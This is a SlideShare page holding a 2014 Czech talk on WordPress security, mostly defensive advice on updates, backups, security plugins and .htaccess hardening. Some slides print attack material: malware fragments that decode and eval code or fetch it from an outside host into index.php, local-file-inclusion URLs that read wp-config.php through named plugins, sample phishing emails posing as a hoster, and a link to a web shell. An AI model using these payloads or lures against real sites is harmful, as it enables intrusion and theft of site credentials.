Nejlepší reklamní kampaně 2013 a 2014Nejlepší reklamní kampaně 2013 a 2014
Nejlepší reklamní kampaně 2013 a 2014RobertNemec.com
 
Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...
Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...
Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...Jan Kvasnička
 
Ergonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketing
Ergonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketingErgonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketing
Ergonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketingJan Kvasnička
 
Největší SEO chyby e-shopů
Největší SEO chyby e-shopůNejvětší SEO chyby e-shopů
Největší SEO chyby e-shopůPavel Ungr
 
Pomezí webové analytiky a "těch opravdových" dat
Pomezí webové analytiky a "těch opravdových" datPomezí webové analytiky a "těch opravdových" dat
Pomezí webové analytiky a "těch opravdových" datPavel Jašek
 
15 super tipů pro reklamy na Facebooku
15 super tipů pro reklamy na Facebooku15 super tipů pro reklamy na Facebooku
15 super tipů pro reklamy na Facebookuigloonet
 
Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014
Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014
Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014Jan Kvasnička
 

Destaque (17)

Wordpress multisite
Wordpress multisiteWordpress multisite
Wordpress multisite
 
Je WooCommerce vhodná pro eshop?
Je WooCommerce vhodná pro eshop?Je WooCommerce vhodná pro eshop?
Je WooCommerce vhodná pro eshop?
 
5 otázek, když plánujete web
5 otázek, když plánujete web5 otázek, když plánujete web
5 otázek, když plánujete web
 
Email marketing na WordPress webu
Email marketing na WordPress webuEmail marketing na WordPress webu
Email marketing na WordPress webu
 
Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013
Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013
Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013
 
Magický seminář - 6.11.2012
Magický seminář - 6.11.2012Magický seminář - 6.11.2012
Magický seminář - 6.11.2012
 
Jak zvýšit obrat eshopu? Case studies www.svetcukraru.cz
Jak zvýšit obrat eshopu? Case studies www.svetcukraru.czJak zvýšit obrat eshopu? Case studies www.svetcukraru.cz
Jak zvýšit obrat eshopu? Case studies www.svetcukraru.cz
 
Affiliate marketing
Affiliate marketingAffiliate marketing
Affiliate marketing
 
Materiály ze školení Facebook PPC reklam pro pokročilé
Materiály ze školení Facebook PPC reklam pro pokročiléMateriály ze školení Facebook PPC reklam pro pokročilé
Materiály ze školení Facebook PPC reklam pro pokročilé
 
Marketing elektronických obchodů na sociálních sítích v roce 2013.
Marketing elektronických obchodů na sociálních sítích v roce 2013.Marketing elektronických obchodů na sociálních sítích v roce 2013.
Marketing elektronických obchodů na sociálních sítích v roce 2013.
 
Nejlepší reklamní kampaně 2013 a 2014
Nejlepší reklamní kampaně 2013 a 2014Nejlepší reklamní kampaně 2013 a 2014
Nejlepší reklamní kampaně 2013 a 2014
 
Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...
Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...
Chcete vyšší konverze? Zkuste porušit pravidla | E-business forum 2014 | 25.9...
 
Ergonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketing
Ergonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketingErgonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketing
Ergonomie webů a eshopů v praxi, 15.1.2013 JsmeMarketing
 
Největší SEO chyby e-shopů
Největší SEO chyby e-shopůNejvětší SEO chyby e-shopů
Největší SEO chyby e-shopů
 
Pomezí webové analytiky a "těch opravdových" dat
Pomezí webové analytiky a "těch opravdových" datPomezí webové analytiky a "těch opravdových" dat
Pomezí webové analytiky a "těch opravdových" dat
 
15 super tipů pro reklamy na Facebooku
15 super tipů pro reklamy na Facebooku15 super tipů pro reklamy na Facebooku
15 super tipů pro reklamy na Facebooku
 
Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014
Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014
Jak navrhnout úspěšný web krok za krokem | VŠB - APPLE JUICE MEETING | 27.3.2014
 

Semelhante a Jak si (ne)nechat hacknout Wordpress stránky

Prezentace - základy bezpečnosti
Prezentace - základy bezpečnostiPrezentace - základy bezpečnosti
Prezentace - základy bezpečnostiBrilo Team
 
Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...
Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...
Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...Michal Kubicek
 
WordCamp Bratislava 2017 - Martin Hlaváč
WordCamp Bratislava 2017 - Martin HlaváčWordCamp Bratislava 2017 - Martin Hlaváč
WordCamp Bratislava 2017 - Martin HlaváčBrilo Team
 
10 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 2014
10 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 201410 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 2014
10 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 2014Radek Kucera
 
KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)
KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)
KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)Michal ZOBEC
 
Boty v použitelnosti
Boty v použitelnostiBoty v použitelnosti
Boty v použitelnostiSherpas
 
20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitněJiří Mareš
 
Bezpečnostní útoky na webové aplikace
Bezpečnostní útoky na webové aplikaceBezpečnostní útoky na webové aplikace
Bezpečnostní útoky na webové aplikaceMichal Špaček
 
Víceúrovňová obrana vysvětlená na Cross-Site Scriptingu
Víceúrovňová obrana vysvětlená na Cross-Site ScriptinguVíceúrovňová obrana vysvětlená na Cross-Site Scriptingu
Víceúrovňová obrana vysvětlená na Cross-Site ScriptinguMichal Špaček
 
Bezpečnostní útoky na webové aplikace, Čtvrtkon 5
Bezpečnostní útoky na webové aplikace, Čtvrtkon 5Bezpečnostní útoky na webové aplikace, Čtvrtkon 5
Bezpečnostní útoky na webové aplikace, Čtvrtkon 5Michal Špaček
 
Přístupnost a slabiny WWW stránek obcí
Přístupnost a slabiny WWW stránek obcíPřístupnost a slabiny WWW stránek obcí
Přístupnost a slabiny WWW stránek obcíJiří Napravnik
 
Noční můry webového vývojáře
Noční můry webového vývojářeNoční můry webového vývojáře
Noční můry webového vývojářeMichal Špaček
 
Základní pluginy pro WordPress
Základní pluginy pro WordPressZákladní pluginy pro WordPress
Základní pluginy pro WordPressRadek Kucera
 
Optimalizace obrázků v (responsivních) šablonách
Optimalizace obrázků v (responsivních) šablonáchOptimalizace obrázků v (responsivních) šablonách
Optimalizace obrázků v (responsivních) šablonáchSUPERKODERS
 
Malware Houdiny
Malware HoudinyMalware Houdiny
Malware HoudinyCESNET
 
Jak nám pomůže ochrana perimetru
Jak nám pomůže ochrana perimetruJak nám pomůže ochrana perimetru
Jak nám pomůže ochrana perimetruMarketingArrowECS_CZ
 

Semelhante a Jak si (ne)nechat hacknout Wordpress stránky (19)

Prezentace - základy bezpečnosti
Prezentace - základy bezpečnostiPrezentace - základy bezpečnosti
Prezentace - základy bezpečnosti
 
Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...
Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...
Jak si (ne)nechat hacknout Wordpress stránky - How to have unhackable WordPre...
 
WordCamp Bratislava 2017 - Martin Hlaváč
WordCamp Bratislava 2017 - Martin HlaváčWordCamp Bratislava 2017 - Martin Hlaváč
WordCamp Bratislava 2017 - Martin Hlaváč
 
10 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 2014
10 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 201410 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 2014
10 tipů pro lepší zabezpečení WordPressu - 2. Wordpress konference Hluboká 2014
 
KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)
KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)
KeePass: Základy, pokročilé využití a KeePass Enterprise (čtvrtek, 14.4.2022)
 
Boty v použitelnosti
Boty v použitelnostiBoty v použitelnosti
Boty v použitelnosti
 
20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně
 
QualysGuard InfoDay 2014 - WAS
QualysGuard InfoDay 2014 - WASQualysGuard InfoDay 2014 - WAS
QualysGuard InfoDay 2014 - WAS
 
Bezpečnostní útoky na webové aplikace
Bezpečnostní útoky na webové aplikaceBezpečnostní útoky na webové aplikace
Bezpečnostní útoky na webové aplikace
 
Víceúrovňová obrana vysvětlená na Cross-Site Scriptingu
Víceúrovňová obrana vysvětlená na Cross-Site ScriptinguVíceúrovňová obrana vysvětlená na Cross-Site Scriptingu
Víceúrovňová obrana vysvětlená na Cross-Site Scriptingu
 
Bezpečnostní útoky na webové aplikace, Čtvrtkon 5
Bezpečnostní útoky na webové aplikace, Čtvrtkon 5Bezpečnostní útoky na webové aplikace, Čtvrtkon 5
Bezpečnostní útoky na webové aplikace, Čtvrtkon 5
 
Úvod k Wordpressu
Úvod k WordpressuÚvod k Wordpressu
Úvod k Wordpressu
 
Přístupnost a slabiny WWW stránek obcí
Přístupnost a slabiny WWW stránek obcíPřístupnost a slabiny WWW stránek obcí
Přístupnost a slabiny WWW stránek obcí
 
Noční můry webového vývojáře
Noční můry webového vývojářeNoční můry webového vývojáře
Noční můry webového vývojáře
 
7 omylu v IT bezpečnosti
7 omylu v IT bezpečnosti7 omylu v IT bezpečnosti
7 omylu v IT bezpečnosti
 
Základní pluginy pro WordPress
Základní pluginy pro WordPressZákladní pluginy pro WordPress
Základní pluginy pro WordPress
 
Optimalizace obrázků v (responsivních) šablonách
Optimalizace obrázků v (responsivních) šablonáchOptimalizace obrázků v (responsivních) šablonách
Optimalizace obrázků v (responsivních) šablonách
 
Malware Houdiny
Malware HoudinyMalware Houdiny
Malware Houdiny
 
Jak nám pomůže ochrana perimetru
Jak nám pomůže ochrana perimetruJak nám pomůže ochrana perimetru
Jak nám pomůže ochrana perimetru
 

Mais de Vladimír Smitka

Co ukázal globální scan přístupných .git repozitářů?
Co ukázal globální scan přístupných .git repozitářů?Co ukázal globální scan přístupných .git repozitářů?
Co ukázal globální scan přístupných .git repozitářů?Vladimír Smitka
 
Drobné chyby, které vám mohou zlomit vaz
Drobné chyby, které vám mohou zlomit vazDrobné chyby, které vám mohou zlomit vaz
Drobné chyby, které vám mohou zlomit vazVladimír Smitka
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersVladimír Smitka
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuningVladimír Smitka
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyoneVladimír Smitka
 
České weby a Wordpress (Q4/2014)
České weby a Wordpress (Q4/2014)České weby a Wordpress (Q4/2014)
České weby a Wordpress (Q4/2014)Vladimír Smitka
 
Wordcamp Praha 2015 - další útržky z prezentace
Wordcamp Praha 2015 - další útržky z prezentaceWordcamp Praha 2015 - další útržky z prezentace
Wordcamp Praha 2015 - další útržky z prezentaceVladimír Smitka
 
Sítě pro malé a střední podniky 2014
Sítě pro malé a střední podniky 2014Sítě pro malé a střední podniky 2014
Sítě pro malé a střední podniky 2014Vladimír Smitka
 

Mais de Vladimír Smitka (13)

Webmeetup #3
Webmeetup #3Webmeetup #3
Webmeetup #3
 
Co ukázal globální scan přístupných .git repozitářů?
Co ukázal globální scan přístupných .git repozitářů?Co ukázal globální scan přístupných .git repozitářů?
Co ukázal globální scan přístupných .git repozitářů?
 
WP Weekend 2018
WP Weekend 2018WP Weekend 2018
WP Weekend 2018
 
Drobné chyby, které vám mohou zlomit vaz
Drobné chyby, které vám mohou zlomit vazDrobné chyby, které vám mohou zlomit vaz
Drobné chyby, které vám mohou zlomit vaz
 
Http/2 vs Image Sprites
Http/2 vs Image SpritesHttp/2 vs Image Sprites
Http/2 vs Image Sprites
 
Ansible
AnsibleAnsible
Ansible
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyone
 
České weby a Wordpress (Q4/2014)
České weby a Wordpress (Q4/2014)České weby a Wordpress (Q4/2014)
České weby a Wordpress (Q4/2014)
 
Wordcamp Praha 2015 - další útržky z prezentace
Wordcamp Praha 2015 - další útržky z prezentaceWordcamp Praha 2015 - další útržky z prezentace
Wordcamp Praha 2015 - další útržky z prezentace
 
Dijskrův algoritmus
Dijskrův algoritmusDijskrův algoritmus
Dijskrův algoritmus
 
Sítě pro malé a střední podniky 2014
Sítě pro malé a střední podniky 2014Sítě pro malé a střední podniky 2014
Sítě pro malé a střední podniky 2014
 

Jak si (ne)nechat hacknout Wordpress stránky

  • 1. Jak si (ne)nechat hacknout Wordpress stránky Vláďa Smitka vladimir.smitka@lynt.cz @smitka (ale skoro nic nepíšu) Lynt services s.r.o. http://lynt.cz 22. 9. 2014 1
  • 2. BEZPEČNOST VE WORDPRESS Slide z prezentace Michala Kubíčka – http://michalkubicek.cz http://lynt.cz
  • 3. 5 nejlepších rad Aktualizujte Zálohujte Používejte bezpečnostní plugin Buďte opatrní * Smažte co nepotřebujete a nedávejte světu moc informací. http://lynt.cz 22. 9. 2014 3
  • 4. Bezpečnostní problém? Můžeme si za to sami!!! http://lynt.cz 22. 9. 2014 4
  • 5. Kdo, co, jak a proč Kdo se na nás pokouší zaútočit? Co nám udělá? Jak to udělá? Proč to ***** dělá? http://lynt.cz 22. 9. 2014 5
  • 6. Kdo, co, jak a proč Kde se berou? např. infikované počítače (zombie v botnetu), jiné infikované weby… http://lynt.cz Roboti Zkusí pár zranitelností, pár hesel, když se to nepovede, tak jdou pryč. Cíle vybírají náhodně. 22. 9. 2014 6
  • 7. Kdo, co, jak a proč Najdou si zranitelné oběti, např. přes Google hacking (Google Dork). Zkouší všechno co umí. Když se to nepovede, tak jdou většinou dál. Je jim vcelku jedno kdo je cíl. http://lynt.cz Anonymní hackeři 22. 9. 2014 7
  • 8. Kdo, co, jak a proč Chtějí váš konkrétní web. Zjišťují mnoho informací. Zkouší všechno, co umí. Když se to nepovede, tak se vrátí jakmile se objeví další zranitelnost, nebo hledají jiné cesty – phishing, malware… Kde se berou? Může to být konkurence – i nepřímá. Hodí jim odkaz z vašeho webu, nebo info o návštěvnících http://lynt.cz Cílení hackeři 22. 9. 2014 8
  • 9. Kdo, co, jak a proč Photo by Lisa, CC BY-SA 2.0 Bez technických znalostí, využijí dostupný exploit (program), často je samotné nakazí  http://lynt.cz Děti script kiddies 22. 9. 2014 9
  • 10. Kdo, co, jak a proč Cizí kód Vloží spamové odkazy, reklamu, přesměrování Nechají návštěvníky stahovat malware Použijí web na DDOS a jiné útoky Krádež informací Získají osobní informace uživatelů webu Omezení provozu Odstaví web/server (DOS) http://lynt.cz 22. 9. 2014 10
  • 11. Kdo, co, jak a proč Bezpečnostní chyba v pluginech a šablonách Bezpečnostní chyba v jádru WP Brutal force útok na Admin Spam z komentářů (+pingbacky) Odchytnutí hesla a cookie Z jiných webů na hostingu Útok oklikou – phishing, malware (keylogger, uložené heslo FTP) http://lynt.cz 22. 9. 2014 11
  • 12. Kdo, co, jak a proč Photo by 401(K) 2012, CC BY-SA 2.0 Přímé peníze z reklamy. Získání zpětných odkazů. Infikování počítačů – tvorba botnetu – pronájem/těžení bitcoinů. Odstavení/získání důvěrných info konkurence. Ukázání technických dovedností a jejich následný pronájem. http://lynt.cz 22. 9. 2014 12
  • 13. Pluginy a šablony Můžou prakticky všechno – vyžadují zvýšenou pozornost, pravidelné aktualizace a mazání nepotřebných – soubory neaktivního pluginu stále mohou obsahovat zranitelnosti. Mohou obsahovat vědomé a nevědomé bezpečnostní problémy. Vědomé Můžete stáhnout šablonu/plugin z nějakého nedůvěryhodného zdroje a ten může obsahovat překvapení. Torrent, Uložto atd. nejsou důvěryhodné zdroje  Nevědomé Prostě chyba, snaha přinést uživateli pěknou funkci s malým úsilím. Nejčastěji se šikovným dotazem podaří stáhnout zajímavý soubor (wp-config…), nebo naopak nahrát svůj zajímavý soubor. Mohou být špatně ošetřené uživatelské vstupy a povede se vykonat nějaký kód (PHP nebo JavaScript). http://lynt.cz To, že za plugin platím, neznamená, že je důvěryhodný. 22. 9. 2014 13 Photo by Wikipedia
  • 14. Překvapení <?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb…));?> <?php $code_txt = 'http://javaterm.com/r9.txt'; … if(is_dir($path.'/wp-content')…){ $code= file_get_contents($code_txt); $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){…} eval(gzinflate(base64_decode(…))) preg_replace("/.+/e","x65x76x61x6Cx28x67...) ob_start(…); … if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime |Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret))… http://lynt.cz 404.php 22. 9. 2014 14
  • 15. Chyby Download ShortCode - LFI (CVE-2014-5465) /wp-content/force-download.php?file=../wp-config.php $file = $_GET['file']; if(isset($file)) { http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php Revolution slider - LFI LFI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php MailPoet – File Dropper Ověření uploadu pomocí hooku add_action( 'admin_init', ‚…' ) – pouští se při spuštění stránky v administraci – např. admin-post.php – uploader „šablony“ emailu v zip OptimizePress Theme – File Dropper /wp-content/themes/OptimizePress/lib/admin/media-upload.php – vlastní uploader bez dostatečného zabezpečení http://lynt.cz include("pages/$file"); } else { include("index.php"); } 22. 9. 2014 15
  • 16. Chyby v jádře Již je toho hodně vyladěno, ale určitě mnoho zbývá  Kritické se neobjevují tak často, většinou se jedná o unik informací nebo DOS. Po odhalení je oprava často rychle dostupná a díku auto-update i nasazená. Chyba v XML-RPC (týkala se i Drupalu) – speciální XML soubor dokázal vygenerovat několika GB požadavek – došlo k vyčerpání prostředků. V základu není limitován počet chybných přihlášení (lze řešit pluginem) Lze jednoduše získat uživatelské jméno: http://www.justit.cz/wordpress/?author=2 => http://www.justit.cz/wordpress/author/ddoc/ RewriteRule ^author/(.*)$ http://jdi-nekam.com/ [R,L] http://lynt.cz Chyby, které jsou vlastnostmi: 22. 9. 2014 16
  • 17. Spam Nejjednodušší cesta – přidat komentář, když je to možné. Když to není možné, přesvědčit se, zda to opravdu není možné: /?p=1 => možná admin nesmazal první Hello World příspěvek, který má povoleny komentáře (globální vypnutí komentářů se vztahuje pouze na nové příspěvky) Můžeme uzavřít komentáře po X dnech stáří článku. function lynt_disable_comments_on_pages( $file ) { return is_page() ? __FILE__ : $file; } add_filter( 'comments_template', 'lynt_disable_comments_on_pages'); http://lynt.cz Vypnutí komentářů na stránkách: 22. 9. 2014 17
  • 18. Spam – ale já komentáře chci Použití antispamového filtru: Akismet • předinstalovaný v základu, chce drobný poplatek • používá kontextové filtrování a reputaci IP adresy • někdy může dojít k zablokování regulérního příspěvku HoneyPot • nastraží políčko, které vyplní jen robot, • komentář rovnou odstraní • pokud se jedná o cílenější spamování, můžou spamy projít • Pluginy: NoSpamNX, Honeypot Comments Tyto řešení se nevztahují na pingbacky, pokud je nechci, tak je dobré je vypnout. http://lynt.cz Captcha • nemám ji rád  22. 9. 2014 18
  • 19. Bezpečnostní problém? Můžeme si za to sami!!! http://lynt.cz 22. 9. 2014 19
  • 20. Člověk je nejslabší článek Dáváme slabá hesla a používáme uživatelské jméno admin. Hesla si nešifrovaně ukládáme a používáme je na více webech. Doporučuji: nainstalovat WP klidně s uživatelem admin, nainstalovat si vše potřebné, založit nového uživatele s právy admina, a starého smazat. Používat správce hesel např. KeePass a využívat jeho generátor hesel. Přihlašovací heslo není složité odchytnout. Není vhodné se přihlašovat z neznámých sítí (wifi i kabelových), pokud nemám SSL v administraci. Proč vlastně nezapnout SSL pro celý web? http://lynt.cz define('FORCE_SSL_ADMIN', true); define('FORCE_SSL_LOGIN', true); 22. 9. 2014 20
  • 21. Člověk je nejslabší článek http://lynt.cz 22. 9. 2014 21
  • 22. Člověk je nejslabší článek http://lynt.cz 22. 9. 2014 22
  • 23. Člověk je nejslabší článek S tímto cookie se mohu přihlásit i bez znalosti hesla cookie wordpress_logged_in_...se posílá stále, nejen při přístupu do adminu http://lynt.cz 22. 9. 2014 23
  • 24. Člověk je nejslabší článek Předmět: Bezpečnostní problém WEDOS Hosting [8614001612] Datum: Wed, 20 Sep 2014 14:32:48 +0200 Od: WEDOS <hosting@wedos.com> Komu: <ty> Na Vaší webové prezentaci tvujweb.cz založené na redakčním systému Wordpress byla zjištěna závažná bezpečnostní chyba v pluginu Skvělej Plugin, které umožňuje útočníkovi získat plnou kontrolu nad Vaším webem a následně útočit na další weby. Oficiální oprava zatím není k dispozici. Naši specialisté však mohou chybu opravit ručně. K tomu potřebujeme Vaše přihlašovací údaje do administrace Wordpress. Zašlete nám je prosím obratem, ať můžeme zabránit dalším útokům. V opačném případě budeme bohužel nuceni Vaši webovou prezentaci pozastavit. http://lynt.cz Vážený zákazníku, WEDOS Internet, a.s. 22. 9. 2014 24
  • 25. Člověk je nejslabší článek Předmět: Bezpečnostní problém WEDOS Hosting [8614001612] Datum: Wed, 20 Sep 2014 14:32:48 +0200 Od: WEDOS <hosting@wedos.com> Komu: <ty> Na Vaší webové prezentaci tvujweb.cz založené na redakčním systému Wordpress byl zjištěna škodlivý kód, který masivně útočí na další weby a infikuje návštěvníky. Neprodleně nainstalujte náš antivirový plugin Wedos-WP-Antivir, který naleznete v příloze i s návodem k instalaci. V opačném případě budeme bohužel nuceni Vaši webovou prezentaci pozastavit. http://lynt.cz Vážený zákazníku, WEDOS Internet, a.s. 22. 9. 2014 25
  • 26. Člověk je nejslabší článek Jste si jistí, že se obezřetně chovají i ostatní uživatelé, kteří mají přístup k webu? I získání neadministrátorského účtu může mít velké důsledky – upload souborů, vkládání obsahu. Uživatelské role Administrator a Editor mohou standardně vkládat do komentářů JavaScript. http://lynt.cz Jste si jistí, že se chováte obezřetně? 22. 9. 2014 26
  • 27. Co mi mohou udělat okolní weby? Pokud není hosting správně nakonfigurován, může napadený web přistupovat k souborům i na ostatních webech. Nejčastější metody oddělení webů: Ze stejné IP adresy je rozesílán spam, stahován malware – dostane se na blacklisty http://lynt.cz Přímé ohrožení: • Vlastní uživatelé • Open_basedir • Různé typy chroot Nepřímé ohrožení: 22. 9. 2014 27
  • 28. Co s tím vším mám dělat? http://lynt.cz 22. 9. 2014 28
  • 29. Aktualizujte Problém č. 1 – jak se dozvědět o aktualizaci? • WP Updates Notifier – při dostupném updatu zašle email • Více webů lze udržovat hromadně pomocí InfiniteWP • Sledovat informace o aktuálních hrozbách (zdroje na konci prezentace) Problém č. 2 – nerozbije se to? Pravděpodobně někdy ano, ale lepší než bezpečnostní rizika Jádro s ve WP 3.8+ aktualizuje samo define( 'WP_AUTO_UPDATE_CORE', true ); - povolí i majoritní updaty Automatická aktualizace pluginů a šablon zapnout: add_filter( 'auto_update_plugin', '__return_true' ); add_filter( 'auto_update_theme', '__return_true' ); Pozor na vlastní úpravy. V případě šablon je vhodné si udělat odvozenou šablonu. S použitím menšího množství pluginů klesnou nároky na správu i bezpečnostní rizika. http://lynt.cz 22. 9. 2014 29
  • 30. Zálohujte Po případném napadení bude možné se vrátit k neinfikované verzi. Pozor, kam se záloha ukládá. Řešení hostingu/ruční záloha DB a souborů Zálohovací plugin: např. BackWPup, BackupBuddy Součást některých dalších pluginů a nástrojů (InfiniteWP) „Zálohování je alfou a omegou práce na počítači.“ http://lynt.cz Photo by Sean MacEnte, CC BY 2.0 22. 9. 2014 30
  • 31. Používejte bezpečnostní plugin Komplexnější řešení, které opraví některé zneužitelné díry, omezí brutal force útoky na administraci, najdou podezřelý kód. Vyberte si svého favorita: • Wordfence • iThemes Security • All in One WP security http://lynt.cz 22. 9. 2014 31
  • 32. Wordfence http://lynt.cz Realtime scanner • Pokouší se zjistit, zda je návštěvník bot nebo člověk a umí dle toho nastavovat politiky • Blokuje přístupy do administrace • Scanuje soubory na podezřelý kód • Umí cachování pro dorovnání výkonnostní ztráty • Notifikuje při změnách souborů • Prémiové funkce (39$/rok): přihlašování pomocí SMS, vzdálené scany, antispam v komentářích 22. 9. 2014 32
  • 33. iThemes Security http://lynt.cz Průvodce bezpečností • Blokuje přístupy do administrace • Blokuje IP adresy (má i distribuovaný seznam) • Zálohuje databázi • Hledá malware v souborech • Detekuje zvýšené množství 404 • Monitoruje změny v souborech • Přesměruje přihlašování • Správně nastaví práva k souborům a složkám • Umí změnit prefix databáze • Další nástroje od vydavatele (Sync, BackupBuddy,…) 22. 9. 2014 33
  • 34. All in One WP Security Vše, co potřebujete na pár kliků • Podobné funkce jako iThemes Security • Někde podrobnější nastavení • + umožňuje „zakázat“ kopírování obsahu • + zákaz používání obrázků na jiných webech • + captcha do komentářů a login page (sem umí dát i honeypot) iThemes více radí, co máte udělat. http://lynt.cz 22. 9. 2014 34
  • 35. Co mohu udělat sám • Změnit prefix DB při instalaci • Zákaz PHP v /wp-content/uploads/ - .htaccess • Zakázání XML-RPC - .htaccess (příp. add_filter('xmlrpc_enabled', '__return_false');) • Přidat další ochranu k wp-login (http auth, 2 fázová autentifikace) - .htaccess • Hlídat referer (přihlašování, komentáře) - .htaccess • Zkontrolovat práva složek a souborů • Zamaskovat verzi WP a ServerSignature - .htaccess, wp-config.php • disable_functions (exec, passthru,shell_exec, system, proc_open, popen, eval – zde může něco přestat fungovat – jetpack, zip,…) – php.ini • allow_url_fopen, allow_url_include – php.ini/ .htaccess • Posunout wp-config.php o úroveň výše – otázka, jaký to má smysl (doporučení vzniklo chybou v systému Plesk, který deaktivoval PHP a zdrojové kódy tak byly přímo dostupné), lepší je dát wp-config do paralelní složky a includovat ho http://lynt.cz 22. 9. 2014 35
  • 36. .htaccess http://lynt.cz Globální .htaccess ServerSignature off #zakazani xml-rpc RedirectMatch 403 /(.*)/xmlrpc.php$ #kontrola refereru RewriteCond %{REQUEST_METHOD} POST RewriteCond %{REQUEST_URI} .(wp-comments-post|wp-login).php* RewriteCond %{HTTP_REFERER} !.*example.com.* [OR] RewriteCond %{HTTP_USER_AGENT} ^$ RewriteRule ^(.*)$ - [F,L] #zákaz přístupu k některým souborům <FilesMatch "license.txt|wp-config-sample.php|readme.html|.htaccess|wp-config.php"> Order allow,deny Deny from all </FilesMatch> .htaccess ve složce /wp-content/uploads/ php_flag engine off Jiná možnost: <FilesMatch .php$> Order allow,deny Deny from all </FilesMatch> Další tipy (MySQL injection…): https://secure.rivalhost.com/knowledgebase/1037/htaccess-against-MySQL-injections- and-other-hacks.html 22. 9. 2014 36
  • 37. Práva složek a souborů root directory 755 wp-includes/ 755 .htaccess 644 wp-admin/index.php 644 wp-admin/js/ 755 wp-content/themes/ 755 wp-content/plugins/ 755 wp-admin/ 755 wp-content/ 755 wp-config.php 644 http://lynt.cz z All in One WP Security 22. 9. 2014 37
  • 38. Problematika DOS a DDOS • Částečně lze řešit pomocí cachovacího pluginu (WP-SuperCache) – některé útoky postupně např. vyčerpají počet povolených php procesů • Analýza botů ve Wordfence • Další řešení je použít službu typu CloudFlare/Incapsula (WAF – web application firewall) • Masivní útok může ucpat linku = záleží pak na technologiích poskytovatele http://lynt.cz 22. 9. 2014 38
  • 39. Zdroje dalších informací • http://www.kyberbezpecnost.cz/ • http://packetstormsecurity.com/search/?q=wordpress – vhodné do http://lynt.cz RSS • http://blog.sucuri.net/ • https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress • http://codex.wordpress.org • https://github.com/b374k/b374k – nejčastěji uploadovaný nástroj útočníky • https://www.startssl.com – základní SSL certifikát zdarma • http://edu.lynt.cz/ – náš výukový portál, časem zde mohou být zajímavé informace 22. 9. 2014 39
